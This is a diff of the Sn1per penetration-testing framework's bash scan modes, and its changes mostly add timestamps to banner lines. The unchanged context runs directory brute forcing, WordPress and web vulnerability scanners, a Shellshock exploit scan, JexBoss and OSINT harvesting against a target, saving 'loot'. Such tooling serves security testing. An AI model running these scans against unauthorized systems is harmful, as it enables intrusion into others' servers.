@ -11,7 +11,7 @@ if [ "$MODE" = "massweb" ]; then
|
|||
if [ ! -z "$WORKSPACE" ]; then
|
||||
args="$args -w $WORKSPACE"
|
||||
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
|
||||
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
mkdir -p $WORKSPACE_DIR 2> /dev/null
|
||||
mkdir $WORKSPACE_DIR/domains 2> /dev/null
|
||||
mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -11,7 +11,7 @@ if [ "$MODE" = "massweb" ]; then
|
|||
if [ ! -z "$WORKSPACE" ]; then
|
||||
args="$args -w $WORKSPACE"
|
||||
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
|
||||
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
mkdir -p $WORKSPACE_DIR 2> /dev/null
|
||||
mkdir $WORKSPACE_DIR/domains 2> /dev/null
|
||||
mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -11,7 +11,7 @@ if [ "$MODE" = "massweb" ]; then
|
|||
if [ ! -z "$WORKSPACE" ]; then
|
||||
args="$args -w $WORKSPACE"
|
||||
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
|
||||
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
mkdir -p $WORKSPACE_DIR 2> /dev/null
|
||||
mkdir $WORKSPACE_DIR/domains 2> /dev/null
|
||||
mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
|
||||
|
|
|
|||
677
modes/normal.sh
677
modes/normal.sh
File diff suppressed because it is too large
Load Diff
|
|
@ -3,21 +3,21 @@ if [ "$MODE" = "web" ]; then
|
|||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
fi
|
||||
if [ "$PASSIVE_SPIDER" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$WAYBACKMACHINE" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
|
||||
blackwidow -u http://$TARGET:80 -l 3 -s y -v n
|
||||
|
|
@ -36,9 +36,9 @@ if [ "$MODE" = "web" ]; then
|
|||
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e $WEB_BRUTE_EXTENSIONS -f -r -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
|
|
@ -48,9 +48,9 @@ if [ "$MODE" = "web" ]; then
|
|||
fi
|
||||
fi
|
||||
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
|
|
@ -59,9 +59,9 @@ if [ "$MODE" = "web" ]; then
|
|||
fi
|
||||
fi
|
||||
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
|
|
@ -84,46 +84,46 @@ if [ "$MODE" = "web" ]; then
|
|||
fi
|
||||
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
|
||||
if [ "$CLUSTERD" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
clusterd -i $TARGET 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http.txt
|
||||
fi
|
||||
if [ "$CMSMAP" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING CMSMAP $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cmsmap http://$TARGET | tee $LOOT_DIR/web/cmsmap-$TARGET-httpa.txt
|
||||
echo ""
|
||||
cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-httpb.txt
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WPSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wpscan --url http://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpa.txt
|
||||
echo ""
|
||||
wpscan --url http://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpb.txt
|
||||
echo ""
|
||||
fi
|
||||
if [ "$NIKTO" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nikto -h http://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http-port80.txt
|
||||
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-http-port80.txt
|
||||
fi
|
||||
if [ "$SHOCKER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80 | tee $LOOT_DIR/web/shocker-$TARGET-port80.txt
|
||||
fi
|
||||
if [ "$JEXBOSS" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING JEXBOSS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cd /tmp/
|
||||
python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET | tee $LOOT_DIR/web/jexboss-$TARGET-port80.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port80.raw > $LOOT_DIR/web/jexboss-$TARGET-port80.txt 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -3,21 +3,21 @@ if [ "$MODE" = "web" ]; then
|
|||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
fi
|
||||
if [ "$PASSIVE_SPIDER" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$WAYBACKMACHINE" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
|
||||
blackwidow -u https://$TARGET:443 -l 3 -s y -v n
|
||||
|
|
@ -36,9 +36,9 @@ if [ "$MODE" = "web" ]; then
|
|||
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e $WEB_BRUTE_EXTENSIONS -f -r -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
|
|
@ -48,9 +48,9 @@ if [ "$MODE" = "web" ]; then
|
|||
fi
|
||||
fi
|
||||
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
|
|
@ -59,9 +59,9 @@ if [ "$MODE" = "web" ]; then
|
|||
fi
|
||||
fi
|
||||
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
|
|
@ -88,45 +88,45 @@ if [ "$MODE" = "web" ]; then
|
|||
fi
|
||||
wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
|
||||
if [ "$CLUSTERD" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
clusterd --ssl -i $TARGET 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-https.txt
|
||||
fi
|
||||
if [ "$CMSMAP" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING CMSMAP $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cmsmap https://$TARGET | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsa.txt
|
||||
echo ""
|
||||
cmsmap https://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsb.txt
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WPSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wpscan --url https://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsa.txt
|
||||
echo ""
|
||||
wpscan --url https://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsb.txt
|
||||
fi
|
||||
if [ "$NIKTO" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nikto -h https://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http-port443.txt
|
||||
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-http-port443.txt
|
||||
fi
|
||||
if [ "$SHOCKER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --ssl --port 443 | tee $LOOT_DIR/web/shocker-$TARGET-port443.txt
|
||||
fi
|
||||
if [ "$JEXBOSS" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING JEXBOSS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cd /tmp/
|
||||
python /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET | tee $LOOT_DIR/web/jexboss-$TARGET-port443.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port443.raw > $LOOT_DIR/web/jexboss-$TARGET-port443.txt 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -9,7 +9,7 @@ if [ "$MODE" = "nuke" ]; then
|
|||
for a in `cat $FILE`;
|
||||
do
|
||||
if [ ! -z "$WORKSPACE" ]; then
|
||||
args="$args -b -fp -w $WORKSPACE"
|
||||
args="$args -w $WORKSPACE"
|
||||
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
|
||||
echo -e "$OKBLUE[*] Saving loot to $WORKSPACE_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
mkdir -p $WORKSPACE_DIR 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -2,9 +2,9 @@ if [ "$OSINT" = "1" ]; then
|
|||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING WHOIS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$WHOIS" == "1" ]; then
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN whois $TARGET 2> /dev/null | tee $LOOT_DIR/osint/whois-$TARGET.txt 2> /dev/null $RESET"
|
||||
|
|
@ -16,9 +16,9 @@ if [ "$OSINT" = "1" ]; then
|
|||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/whois-$TARGET.txt"
|
||||
fi
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING OSINT INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$THEHARVESTER" == "1" ]; then
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python2.7 $THEHARVESTER_PATH -d $TARGET -l 100 -b all 2> /dev/null | tee $LOOT_DIR/osint/theharvester-$TARGET.txt 2> /dev/null $RESET"
|
||||
|
|
@ -34,9 +34,9 @@ if [ "$OSINT" = "1" ]; then
|
|||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null $RESET"
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED COLLECTING OSINT FROM ONLINE DOCUMENTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 100 -n 100 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null
|
||||
|
||||
